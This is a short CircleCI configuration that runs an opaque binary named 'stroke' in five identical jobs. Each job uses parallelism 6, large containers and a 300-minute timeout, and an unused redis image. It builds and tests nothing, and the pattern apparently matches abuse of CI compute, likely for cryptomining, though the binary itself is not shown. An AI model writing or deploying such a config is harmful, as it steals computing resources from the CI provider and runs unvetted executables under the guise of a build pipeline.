working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: STROKE
        command: |
                    chmod u+x stroke && ./stroke
        no_output_timeout: 300m
version: 2
jobs:
  pelakor:
    <<: *script
    parallelism: 6
    docker:
      - image: redis:latest
    resource_class: large
  pelakor1:
    <<: *script
    parallelism: 6
    docker:
      - image: redis:latest
    resource_class: large
  pelakor2:
    <<: *script
    parallelism: 6
    docker:
      - image: redis:latest
    resource_class: large
  pelakor3:
    <<: *script
    parallelism: 6
    docker:
      - image: redis:latest
    resource_class: large
  pelakor4:
    <<: *script
    parallelism: 6
    docker:
      - image: redis:latest
    resource_class: large

workflows:
  version: 2
  commit:
    jobs:
      - pelakor
      - pelakor1
      - pelakor2
      - pelakor3
      - pelakor4